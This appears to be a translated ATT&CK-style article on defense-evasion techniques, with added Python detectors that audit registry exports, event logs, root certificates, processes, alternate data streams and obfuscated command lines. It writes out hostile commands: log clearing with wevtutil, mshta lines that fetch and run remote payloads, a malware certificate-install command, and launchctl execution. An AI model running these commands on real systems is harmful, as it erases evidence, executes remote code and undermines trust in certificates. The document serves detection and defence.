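    The UAC-bypass keys, the per-user COM registrations and the IFEO Debugger values discussed in the three sections above can all be audited from a registry export. The script below is an added example (not from the article) that parses a .reg file and flags these entries; the export embedded in it is constructed, and the CLSID, file names and the "avscanner.exe" program in it are made up.

```python
"""Audit a Windows registry export (.reg) for the UAC-bypass, COM-hijack and IFEO
entries described in the sections above.

Added example, not from the article. SAMPLE_REG is a constructed export: the CLSID,
file names and the "avscanner.exe" program are made up. To audit a real host, run
e.g. `reg export HKCU\\Software\\Classes hkcu.reg` and read the file with
encoding="utf-16" (reg.exe writes UTF-16LE).
"""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe"

[HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command]
"IsolatedCommand"="C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-0000000000AA}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\upd.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-0000000000AA}\InprocServer32]
@="C:\\Windows\\System32\\legit.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscanner.exe]
"Debugger"="C:\\Temp\\blackhole.exe"
'''

# (regex over the key path, value name to look for, why it matters)
CHECKS = [
    (r"^HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command$", "@",
     "UAC bypass via eventvwr.exe: per-user handler for .msc files"),
    (r"^HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command$", "IsolatedCommand",
     "UAC bypass via sdclt.exe: per-user 'runas' handler for .exe files"),
    (r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control\.exe$", "@",
     "UAC bypass via sdclt.exe: per-user App Paths entry for control.exe"),
    (r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}\\InprocServer32$", "@",
     "COM hijack candidate: per-user InprocServer32 shadows the machine-wide class"),
    (r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\(Wow6432Node\\)?Microsoft\\Windows NT\\CurrentVersion"
     r"\\Image File Execution Options\\[^\\]+$", "Debugger",
     "IFEO: this Debugger command line runs instead of the named program"),
]

_VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def parse_reg_export(text):
    """Parse .reg text into {key_path: {value_name: data}}; '@' is the default value.
    Only REG_SZ data is unescaped; other types (dword:, hex:) are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else m.group(2)
            data = m.group(3)
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def audit(keys):
    """Return (key_path, value_name, data, reason) for every matching entry."""
    findings = []
    for path, values in keys.items():
        for pattern, value_name, reason in CHECKS:
            if value_name in values and re.match(pattern, path, re.IGNORECASE):
                findings.append((path, value_name, values[value_name], reason))
    return findings


if __name__ == "__main__":
    for path, name, data, reason in audit(parse_reg_export(SAMPLE_REG)):
        print(f"{reason}\n    {path} [{name}] = {data}")
```

    Per-user InprocServer32 entries are normal for per-user installs (they are how many applications register their own COM servers), so the COM finding is a candidate to triage, not a verdict: compare it with the HKLM entry for the same CLSID and check whether the DLL path is under a user profile and whether the file is signed. The UAC-bypass keys and an IFEO Debugger that points at a non-existent program have no legitimate reason to exist.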

    Indicator Blocking

    System: Windows
    Description: Adversaries may try to block the indicators or events that security tools capture for later analysis. This may involve modifying security tools' configuration files or registry keys, or disabling event forwarding.

    Against network-based analysis, an adversary may block the traffic that carries reports to the security management server, for example by stopping the local process responsible for sending telemetry or by adding a firewall rule that blocks traffic to the hosts that aggregate security events.

    Protection recommendations: Ensure that sensors and event forwarders, firewall policies and related mechanisms are protected by appropriate permissions and access controls. Consider automatically restarting event forwarding at regular intervals, and apply proper change management to firewall rules and other system configuration; a host whose telemetry stops arriving is itself an alert condition.

    Indicator Removal from Tools

    System: Windows, Linux, macOS
    Description: If a malicious application is quarantined or otherwise blocked, the adversary can work out what caused his tool to be detected (the indicator), change the tool to remove that indicator, and use the updated version, which the security tools no longer detect. A typical example is detection by checksum or file signature followed by quarantine by anti-virus software: an adversary who notices that his malware was quarantined because of its signature or checksum can use packing or other file modifications to change the signature or checksum and then reuse the malware.

    Protection recommendations: Assume that the adversary has access to the system and knows which methods and tools the resident protection blocks. Use layered and tuned defenses, and investigate any possible compromise of the protected system so that a likely intrusion is escalated rather than closed out.

    Identify and block potentially dangerous and malicious software with application whitelisting tools such as AppLocker and software restriction policies.

    The first detection of a malicious tool may be an alert from anti-virus or another security tool; such events can also occur at the perimeter and be caught by an IDS, mail scanning and so on. Treat an initial detection as a sign that an intrusion has begun and investigate beyond the location of the initial event. Adversaries count on individual anti-virus events not being investigated, or on the analyst failing to link the recorded event with other activity on the network.

    Removing indicators from the host (Indicator Removal on Host)

    System: Windows, Linux, macOS
    Description: Attackers can delete or modify artifacts generated on the attacked system, including logs and intercepted files quarantined. The location and format of the logs may vary depending on the OS, system logs are recorded as Windows Event or Linux / macOS files, such as /.bash_history and .var / log / *.

    Targeted actions that interfere with event collection and alert mechanisms that could be used to detect an intrusion may compromise security tools, with the result that security events will not be analyzed. Such actions may complicate the examination and the response process due to the lack of data on the invasion that occurred.

    Clearing Windows Event Logs
    Windows Event Logs are a record of alerts, notifications and system operation. Microsoft defines an event as "any significant event in the system or a program that requires user notification or logging." There are three system event log sources: System, Application, and Security.
    Adversaries who perform actions related to managing accounts, logging into accounts, accessing directory services, etc. can clear the event log to hide their actions.
    Event logs can be cleared with the following console utility commands:
    wevtutil cl system;
    wevtutil cl application;
    wevtutil cl security.

    Logs can also be cleared by other means, such as PowerShell.

    Security Tips: Use centralized event log storage so that event logs cannot be viewed and managed solely on the local machine. If possible, minimize the delay in forwarding events to avoid long-term storage of logs on the local system. Protect locally stored event log files with proper permissions and authentication, and limit the ability of adversaries to elevate privileges. Use tools to obfuscate and encrypt log files during local storage and during transfer. Monitor logs for event 1102: "The audit log was cleared."
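    The detection described above, as an added example that is not part of the original article or of MITRE ATT&CK: it flags the 1102/104 clearing events and the wevtutil / Clear-EventLog command lines in forwarded event records. The record layout (flattened dicts with EventID, Channel, CommandLine fields) and the sample records are constructed here.

```python
"""Flag Windows event log clearing in forwarded event records.

Added example for this article (not code from the original post or from
MITRE ATT&CK). It assumes events have already been forwarded to a
collector and flattened into dicts with the fields below; the records at
the bottom are constructed samples, not real telemetry.
"""
import re

# Event IDs Windows writes when a log is cleared: 1102 in the Security
# channel, 104 in the System channel (covers System/Application logs).
CLEAR_EVENTS = {
    (1102, "Security"): "Security audit log was cleared",
    (104, "System"): "event log was cleared (System/Application)",
}

# Command lines that clear logs: wevtutil cl / clear-log and the
# PowerShell Clear-EventLog cmdlet. Matched case-insensitively.
CLEAR_CMDLINE = re.compile(
    r"wevtutil(\.exe)?\s+(cl|clear-log)\b|clear-eventlog\b",
    re.IGNORECASE,
)


def classify(event):
    """Return a finding string for one event, or None if it is benign."""
    key = (event.get("EventID"), event.get("Channel"))
    if key in CLEAR_EVENTS:
        who = event.get("SubjectUserName", "?")
        return f"{CLEAR_EVENTS[key]} by {who}"
    # 4688 = Security process creation; Sysmon Event ID 1 carries the
    # same CommandLine field in the Sysmon operational channel.
    if event.get("EventID") in (4688, 1):
        cmd = event.get("CommandLine", "")
        if CLEAR_CMDLINE.search(cmd):
            return f"log-clearing command: {cmd.strip()}"
    return None


def find_log_clearing(events):
    """Return [(computer, finding), ...] for every suspicious event."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append((ev.get("Computer", "?"), hit))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Channel": "Security", "EventID": 4624,
     "SubjectUserName": "alice"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 4688,
     "CommandLine": r"C:\Windows\System32\wevtutil.exe cl Security"},
    {"Computer": "WS01", "Channel": "Security", "EventID": 1102,
     "SubjectUserName": "alice"},
    {"Computer": "SRV02", "Channel": "System", "EventID": 104,
     "SubjectUserName": "svc_backup"},
    {"Computer": "SRV02", "Channel": "Security", "EventID": 4688,
     "CommandLine": "wevtutil.exe qe Security /c:5"},  # query only
]

if __name__ == "__main__":
    for computer, finding in find_log_clearing(SAMPLE_EVENTS):
        print(f"[{computer}] {finding}")
```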

    Indirect Command Execution

    System: Windows
    Permissions: User
    Description: Various Windows utilities can be used to execute commands, possibly without calling cmd. For example, Forfiles, Program Compatibility Assistant (pcalua.exe), components of the Windows subsystem for Linux (WSL), as well as other utilities can trigger the execution of programs and commands from the command line interface, the Run window, or through scripts.

    Attackers can abuse the above utilities to bypass security tools, in particular to launch arbitrary files until their activity is detected or blocked by some means, for example, by group policies that prohibit the use of cmd.

    Protection recommendations: Identify and block potentially dangerous and malicious software with AppLocker and software restriction policies. These mechanisms can be used to disable or restrict user access to utilities that can be used for indirect command execution.

    Install Root Certificate

    System: Windows, Linux, macOS
    Permissions: Administrator, user
    Description: Root certificates are used to identify a certification authority (CA). When the root certificate is installed, the system and applications will trust all the certificates in the root certificate chain. Certificates are typically used to establish secure TLS / SSL connections in a web browser. If a user tries to open a site on which an untrusted certificate is presented, an error message will appear that warns the user about a security risk. Depending on the security settings, the browser may prohibit connections to untrusted sites.

    Installing a root certificate in the attacked system allows an attacker to reduce the overall level of system security. Attackers can use this method to hide security alerts, causing the user to connect via HTTPS to adversary-controlled web servers to steal their credentials.
    Third-party root certificates can also be pre-installed by the software manufacturer or through the software supply chain and used in conjunction with malware and adware, or to enable a man-in-the-middle attack to intercept information transmitted over TLS / SSL secure connections.
    Root certificates can also be cloned and reinstalled. Such certificate chains can be used to sign malicious code in order to bypass the signature verification tools used to block and detect intruders.

    On macOS, the Ay MaMi malware uses the command /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a certificate as a trusted root certificate in the system keychain.

    Protection recommendations: HTTP Public Key Pinning (HPKP) is one way to protect against attacks on the certificate chain. With HPKP the server sends the client a set of public key hashes that are to be the only trusted keys when connecting to this server for a specified period of time.

    Windows Group Policy can be used to manage root certificates and to prevent non-administrators from adding further root certificates to the user's store (HKCU):

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots\Flags = 1.

    The system's root certificates are unlikely to change often, so by monitoring for new certificates you can identify malicious activity or confirm that there are no unnecessary or suspicious certificates. Microsoft provides a list of trusted root certificates via authroot.stl. Sigcheck can be used to dump the contents of the certificate store (sigcheck[64].exe -tuv) and to identify certificates that are not in the Microsoft Certificate Trust List.

    Installed root certificates are in the registry in the following sections:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
    HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER]\SOFTWARE[\Policies]\Microsoft\SystemCertificates\Root\Certificates

    There is a subset of root certificates that is consistently present on Windows systems and can be used as a baseline for monitoring.
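    The baseline monitoring described above, as an added example that is not the article's or MITRE's code: it compares an export of the root stores listed above against a set of trusted thumbprints and gives extra weight to additions in the per-user (HKCU) store, which is what the ProtectedRoots flag is meant to lock down. The export format, the baseline and every thumbprint below are constructed placeholders.

```python
"""Find root certificates that are not in the expected baseline.

Added example for this article (not the article's or MITRE's code). It
assumes the root stores have been exported into (store_path, thumbprint,
subject) records, e.g. from "sigcheck -tuv" output or a registry dump,
and that a baseline of trusted SHA-1 thumbprints (such as the Microsoft
Certificate Trust List) is available. All thumbprints below are
constructed placeholders, not real certificate hashes.
"""
import re

# Store locations the article lists; HKCU is the per-user store that
# non-administrators can write to unless ProtectedRoots\Flags = 1 is set.
MACHINE_STORES = (
    r"HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates",
    r"HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates",
    r"HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates",
)
USER_STORE = r"HKCU\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates"
SHA1_HEX = re.compile(r"^[0-9A-F]{40}$")


def audit_root_stores(records, baseline):
    """Return [(severity, store_path, thumbprint, reason), ...].

    records: iterable of (store_path, thumbprint, subject)
    baseline: set of trusted thumbprints (uppercase hex, no spaces)
    """
    findings = []
    for store, thumb, subject in records:
        thumb = thumb.replace(" ", "").upper()
        if not SHA1_HEX.match(thumb):
            findings.append(("medium", store, thumb, "malformed thumbprint"))
            continue
        if thumb in baseline:
            continue  # known-good root, nothing to report
        if store == USER_STORE:
            # A root trusted by only one user is the classic result of a
            # non-admin install; treat it as the most urgent case.
            findings.append(("high", store, thumb,
                             f"user-store root not in baseline: {subject}"))
        elif store in MACHINE_STORES:
            findings.append(("high", store, thumb,
                             f"machine root not in baseline: {subject}"))
        else:
            findings.append(("medium", store, thumb,
                             f"root in unexpected store: {subject}"))
    return findings


# Constructed baseline and export (placeholder values, not real hashes).
BASELINE = {
    "1111111111111111111111111111111111111111",
    "2222222222222222222222222222222222222222",
}
EXPORT = [
    (MACHINE_STORES[0], "1111111111111111111111111111111111111111", "Root CA A"),
    (MACHINE_STORES[0], "2222222222222222222222222222222222222222", "Root CA B"),
    (USER_STORE, "3333333333333333333333333333333333333333", "Corp Proxy CA"),
    (MACHINE_STORES[1], "4444 4444 4444 4444 4444 4444 4444 4444 4444 4444",
     "Updater Root"),
    (MACHINE_STORES[0], "not-a-thumbprint", "Garbage"),
]

if __name__ == "__main__":
    for sev, store, thumb, reason in audit_root_stores(EXPORT, BASELINE):
        print(f"{sev.upper():6} {thumb} {reason} [{store}]")
```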


    InstallUtil

    System: Windows
    Permissions: User
    Description: InstallUtil is a Windows command line utility that can install and uninstall applications that comply with the .NET Framework specifications. InstallUtil is installed automatically with Visual Studio. The InstallUtil.exe file is signed with a Microsoft certificate and is located at:

    C:\Windows\Microsoft.NET\Framework\v[version]\InstallUtil.exe

    Attackers can use the InstallUtil functionality to proxy code execution and bypass application whitelisting.

    Security Tips: InstallUtil may not be used on your system, so consider blocking the launch of InstallUtil.exe.

    LC_MAIN Hijacking

    System: macOS
    Rights: User, Administrator
    Description: Starting with OS X 10.8, Mach-O executable files include the LC_MAIN header, which indicates the entry point of the binary code for its execution. In earlier versions, the two headers LC_THREAD and LC_UNIXTHREAD were used. The entry point of the binary can be modified so that a malicious addition is executed first, after which execution returns to the original entry point, so that the victim notices nothing. Such modification of binary files is a way to bypass application whitelisting, because the file name and the path to the application remain unchanged.

    Protection recommendations: Use only applications that have valid digital signatures from trusted developers. Modifying the LC_MAIN header invalidates the file signature and changes the checksum of the file.


    Launchctl

    System: macOS
    Permissions: User, Administrator
    Description: Launchctl is a utility for managing the launchd service. With launchctl you can manage system and user services (LaunchDaemons and LaunchAgents), as well as execute commands and programs. Launchctl accepts subcommands on the command line, interactively, or redirected from standard input:

    launchctl submit -l [labelname] -- /Path/to/thing/to/execute "arg" "arg" "arg"

    By starting and restarting services, adversaries can execute code and even bypass whitelisting if launchctl is an allowed process, although loading, unloading and reloading services and daemons may require elevated privileges.

    Protection recommendations: Restrict users' rights to create Launch Agents and to start Launch Daemons through group policy. The KnockKnock application can discover programs that use launchctl to manage Launch Agents and Launch Daemons.


    Masquerading

    System: Windows, Linux, macOS
    Description: Masquerading occurs when the name or location of an executable file, legitimate or malicious, is manipulated or abused in order to circumvent protection. There are several variants of masquerading.
    One variant is to place the executable file in a commonly trusted directory or to give it the name of a legitimate, trusted program. The file name may also merely resemble the name of a legitimate program. This method of masking is used to bypass tools that trust files based on their name or path, as well as to deceive system administrators.

    Another variant of masquerading is for the attacker to use a renamed, modified copy of a legitimate utility, such as rundll32.exe. In this case, the legitimate utility can be moved to another directory and renamed to avoid detection based on monitoring the launch of system utilities from non-standard locations.
    An example of a trusted directory abused on Windows is C:\Windows\System32. The names of trusted system utilities such as explorer.exe or svchost.exe can be given to malicious binaries.

    The next way to masquerade is to use malicious binaries that, after starting, change their process name to the name of a legitimate, trusted process. An example of a trusted directory on Linux is /bin, and trusted names can be names like rsyncd or dbus-inotifier.

    Security Tips: When creating security rules, avoid exceptions based on the file name or path. Require binaries to be signed. Use file system access controls to protect trusted directories such as C:\Windows\System32. Do not rely on tools that restrict program execution based only on the file name or path.

    Identify and block potentially dangerous and malicious software that may look like a legitimate program.
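    The two detectable masquerading variants above (a trusted name launched from the wrong directory or a look-alike name, and a renamed copy of a system utility), as an added example that is not part of the original article or of MITRE ATT&CK. It assumes process records with the full image path and the OriginalFileName from the PE version resource, as Sysmon Event ID 1 reports it; the expected-directory table and the process listing are constructed.

```python
"""Spot masqueraded system binaries in a process listing.

Added example for this article (not from the original post or MITRE).
It assumes process records carry the full image path and, where
available, the OriginalFileName from the PE version resource (as
Sysmon Event ID 1 reports it); the records below are constructed.
"""
from collections import namedtuple

# Where the genuine copies of a few heavily impersonated binaries live.
# Extend from your own golden image; paths are compared case-insensitively.
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "rundll32.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}

Proc = namedtuple("Proc", "pid image original_name")


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent swaps."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                          d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_process(proc):
    """Return a list of masquerading findings for one process record."""
    findings = []
    path = proc.image.lower()
    directory, _, name = path.rpartition("\\")
    if name in EXPECTED_DIRS:
        # Variant 1: a trusted name launched from somewhere it should not be.
        if directory not in EXPECTED_DIRS[name]:
            findings.append(f"{name} running from {directory or '<no dir>'}")
    else:
        # Variant 1b: a look-alike name (svch0st.exe, scvhost.exe, ...).
        for known in EXPECTED_DIRS:
            if osa_distance(name, known) <= 1:
                findings.append(f"{name} resembles {known}")
    # Variant 2: a renamed copy; the PE version resource still names it.
    if proc.original_name and proc.original_name.lower() != name:
        findings.append(f"renamed copy of {proc.original_name} as {name}")
    return findings


def scan(procs):
    """Return {pid: findings} for processes with at least one finding."""
    return {p.pid: f for p in procs if (f := check_process(p))}


# Constructed process listing (not real telemetry).
PROCS = [
    Proc(804, r"C:\Windows\System32\svchost.exe", "svchost.exe"),
    Proc(1234, r"C:\Users\Public\svchost.exe", "svchost.exe"),
    Proc(1300, r"C:\ProgramData\svch0st.exe", "svch0st.exe"),
    Proc(1400, r"C:\Temp\update.exe", "RUNDLL32.EXE"),
    Proc(1500, r"C:\Windows\explorer.exe", "EXPLORER.EXE"),
    Proc(1600, r"C:\Windows\System32\scvhost.exe", "scvhost.exe"),
]

if __name__ == "__main__":
    for pid, findings in scan(PROCS).items():
        print(pid, "; ".join(findings))
```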

    Modify Registry

    System: Windows
    Rights: User, administrator, system
    Description: Attackers can modify the registry to hide information in registry keys, or delete information while cleaning up traces of the intrusion or at other stages of the attack.

    Access to specific areas of the registry depends on account permissions. The built-in Reg utility can be used for both local and remote modification of the registry. Other remote access tools that interact with the registry through the Windows API can also be used.

    Registry changes may include hiding keys, for example by adding keys whose name contains a null character. Reading such a key through Reg or the API will end in an error or the key will be skipped. Attackers can use such hidden pseudo-keys to hide payloads and the commands used for persistence in the system.

    The registry of a remote system can also be modified if the Remote Registry service is active on the target system. Typically, the attacker also needs valid credentials, as well as access to Windows Admin Shares in order to use RPC.

    Protection recommendations: Incorrectly set permissions in the registry can allow an attacker to execute arbitrary code (Service Registry Permissions Weakness). Ensure that users cannot change the keys of system components. Block unnecessary system utilities and other software that can be used to modify the registry. Consider enabling registry auditing (Event ID 4657), but keep in mind that registry changes made using tools such as RegHide will not be recorded by the OS event logging.


    Mshta

    System: Windows
    Permissions: User
    Description: Mshta.exe (located in C:\Windows\System32\) is a utility that executes Microsoft HTML Applications (*.hta). HTA applications run using the same technologies that Internet Explorer uses, but outside the browser. Because Mshta processes files bypassing the browser security settings, attackers can use mshta.exe to proxy the execution of malicious HTA files, JavaScript or VBScript. A malicious file can be launched using an inline script:

    mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

    or directly at the URL:

    mshta http[:]//webserver/payload[.]hta

    Security Tips: The mshta.exe functionality is associated with older versions of IE that have reached end of life. Block Mshta.exe if you are not using its functionality.

    NTFS file attributes (NTFS File Attributes)

    System: Windows
    Description: The NTFS file system contains the Master File Table (MFT), which stores data about the contents of the volume: rows correspond to files and columns to their attributes. The attributes include Extended Attributes (EA, strings of up to 64 KB) and Alternate Data Streams (ADS, metadata of arbitrary size), which can be used to store any data. Attackers can store malicious data and binaries in extended attributes and file metadata. This technique allows some protection tools to be bypassed, such as scanning tools based on static indicators and some anti-virus tools.

    Protection recommendations: Blocking access to EA and ADS can be quite complex and impractical and, in addition, can destabilize standard OS functionality. Direct the protection effort at preventing the launch of software that can be used to hide information in EA and ADS.
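    An added example (not code from the article or from MITRE) of hunting for the alternate data streams described above: it parses captured "dir /r" output, skips the Zone.Identifier mark-of-the-web stream that browsers legitimately add, and marks streams whose name or size suggests hidden code. The listing below is constructed in that layout.

```python
"""List alternate data streams from "dir /r" output.

Added example for this article (not the article's own code). It assumes
the output of "dir /r" has been captured to text (the sample below is
constructed in that layout) and reports every named $DATA stream except
Zone.Identifier, the mark-of-the-web stream browsers add to downloads.
"""
import re

# Stream lines carry no date: size, then file:stream:$DATA.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")
BENIGN_STREAMS = {"zone.identifier"}


def parse_dir_r(text, min_size=0):
    """Return [(file, stream, size_bytes), ...] for suspicious streams."""
    streams = []
    for line in text.splitlines():
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        fname, stream = m.group(2), m.group(3)
        if stream.lower() in BENIGN_STREAMS or size < min_size:
            continue
        streams.append((fname, stream, size))
    return streams


def looks_executable(stream_entry):
    """True if the stream name or size suggests hidden code, not metadata."""
    _, stream, size = stream_entry
    return stream.lower().endswith((".exe", ".dll", ".ps1", ".vbs", ".bat")) \
        or size >= 64 * 1024


# Constructed "dir /r" output for a folder (not a real listing).
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\Users\\Public

01/15/2024  10:23 AM    <DIR>          .
01/15/2024  10:23 AM    <DIR>          ..
01/15/2024  10:23 AM                12 notes.txt
                                 5,120 notes.txt:payload.exe:$DATA
01/15/2024  10:20 AM            40,960 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
01/15/2024  10:25 AM             2,048 report.docx
                               131,072 report.docx:cache:$DATA
               3 File(s)         43,020 bytes
"""

if __name__ == "__main__":
    for entry in parse_dir_r(SAMPLE_DIR_R):
        marker = "!" if looks_executable(entry) else " "
        print(marker, entry)
```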

    Removing connections to network resources (Network Share Connection Removal)

    System: Windows
    Permissions: Administrator, user
    Description: Network share connections and Windows Admin Shares can be removed when they are no longer required. Net is one utility that can be used to remove network connections: net use \\system\share /delete. Adversaries may remove network connections they no longer need in order to clear traces of the intrusion.

    Security Tips: Follow best practices for managing Windows Admin Shares. Identify unnecessary system utilities and software that can be used to connect to network shares and consider auditing their use or blocking them.

    Obfuscated Files or Information

    System: Windows, Linux, macOS
    Description: Attackers can use encoding, encryption, and other methods of obfuscating files and their contents, both on the system and during transfer.
    Payloads can be archived or encrypted; sometimes their deobfuscation and subsequent launch require user action, for example entering a password to open an archive prepared by the attacker.

    Parts of files can also be encoded to hide plain-text strings. A payload can be split into separate "benign" files that perform malicious functionality once assembled into a single unit.

    Adversaries can also obfuscate commands called from payloads directly or via the command line interface. Environment variables, aliases, and characters specific to the semantics of the platform or language can be used to bypass signature-based and whitelist-based malware detection.

    Another example of obfuscation is steganography, a technique for hiding data or code in images, audio tracks, video and text files.

    Protection recommendations: Use tools for analyzing and detecting malicious code that not only check the source code itself but also analyze the execution of commands. In Windows 10, this functionality is provided by the Antimalware Scan Interface (AMSI).

    The presence of escape characters in commands, such as ^ or ", can serve as an indicator of obfuscation. Using Windows Sysmon and Event ID 4688 events, you can view the arguments of commands executed by various processes.

    Obfuscation used in payloads during the initial access stage can be detected on the network using an IDS and email security gateways that identify compressed or encrypted data and scripts in attachments. Detection of payloads transmitted over an encrypted connection from a website can be carried out with encrypted traffic inspection.
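    The command-line indicators named above (caret escapes, excess quotes, environment-variable tricks, encoded interpreter input) turned into a scoring check, as an added example that is not part of the original article or of MITRE ATT&CK. It assumes command lines taken from Sysmon Event ID 1 or Security 4688 records; the weights, the threshold and the sample lines are constructed.

```python
"""Score process command lines for obfuscation indicators.

Added example for this article (not from the original post or MITRE).
It assumes command lines have been extracted from Sysmon Event ID 1 or
Security 4688 records; the sample lines below are constructed.
"""
import re

# Heuristics from the article: escape characters (^ and excess quotes),
# environment-variable tricks, and encoded payloads handed to an
# interpreter. The weights are an assumption to tune against your data.
ENV_VAR = re.compile(r"%[A-Za-z_][A-Za-z0-9_]*(?::~[-\d]+(?:,[-\d]+)?)?%")
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}",
                     re.IGNORECASE)
EMPTY_QUOTES = re.compile(r'"{2,}')  # "" splitting a token, e.g. pow""ershell


def obfuscation_score(cmdline):
    """Return (score, [reasons]) for one command line."""
    score, reasons = 0, []
    carets = cmdline.count("^")
    if carets:
        score += min(carets, 10)
        reasons.append(f"{carets} caret escape(s)")
    quotes = cmdline.count('"')
    if quotes > 6:
        score += 2
        reasons.append(f"{quotes} double quotes")
    if EMPTY_QUOTES.search(cmdline):
        score += 5
        reasons.append("empty quotes splitting a token")
    if ENV_VAR.search(cmdline):
        score += 2
        reasons.append("environment-variable substitution")
    if ENCODED.search(cmdline):
        score += 5
        reasons.append("base64 encoded command")
    return score, reasons


def flag_obfuscated(cmdlines, threshold=5):
    """Return (score, cmdline, reasons) for lines reaching the threshold."""
    out = []
    for cmd in cmdlines:
        score, reasons = obfuscation_score(cmd)
        if score >= threshold:
            out.append((score, cmd, reasons))
    return out


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    r'C:\Windows\System32\cmd.exe /c dir C:\Users',
    r'cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden',
    r'%COMSPEC% /c "set x=powershell&&call %x% -enc ' + "A" * 48 + '"',
    r'cmd.exe /c "ping 127.0.0.1 -n 2 > nul"',
    r'cmd /c pow""ershell -c Get-Process',
]

if __name__ == "__main__":
    for score, cmd, reasons in flag_obfuscated(SAMPLES):
        print(score, cmd[:60], "; ".join(reasons))
```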

    Plist Modification

    System: macOS
    Rights: User, Administrator
    Description: Attackers can modify plist files, specifying in them their own code for execution in the context of another user. The plist property files located in /Library/Preferences run with elevated privileges, and plists from ~/Library/Preferences run with user privileges.

    Security Tips: Prevent plist files from being modified by making them read-only.

    Port knocking

    System: Linux, macOS
    Permissions: User
    Description: Attackers can use port knocking methods to hide the open ports they use to connect to the system.

    Security Tips: Using stateful firewalls can prevent some port knocking variants from being implemented.

    Process doppelganging

    System: Windows
    Rights: User, Administrator, System
    Description: Transactional NTFS (TxF) is a technology first introduced in Windows Vista that allows file operations to be performed as transactions. In TxF, only one transacted handle can write to a file at a time; all other handles are isolated and can only read the version of the file that existed when they were opened. If the system or application crashes, TxF automatically rolls back the changes to the file. TxF is still included in Windows 10.

    The Process Doppelganging technique (from the German Doppelgänger, a double or look-alike) uses undocumented WinAPI functions and is implemented in 4 steps:

    1. Transaction. An NTFS transaction is created on the targeted executable file, and a temporary modified version of the executable is created within the transaction.
    2. Loading. A shared section is created in memory, into which the modified version of the executable is loaded.
    3. Rollback. The NTFS transaction is rolled back, with the result that the original targeted file is preserved on disk in its original form.
    4. Animation. Using the modified version of the executable that remains in RAM, a process is created and its execution is started.

    Thus, the malicious code runs in the context of a legitimate trusted process. Since the attack takes place only in memory (the NTFS transaction is never committed but rolled back), no traces of malicious activity remain on disk.

    Protection recommendations: Preventive measures in the form of attempts to block some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Doppelganging can be used to bypass protection, but it is still good practice to block potentially dangerous applications and restrict software with whitelists. The attack is detected by analyzing calls to the API functions CreateTransaction, CreateFileTransacted and RollbackTransaction, undocumented functions such as NtCreateProcessEx and NtCreateThreadEx, and the API calls used to modify memory in another process, such as WriteProcessMemory.
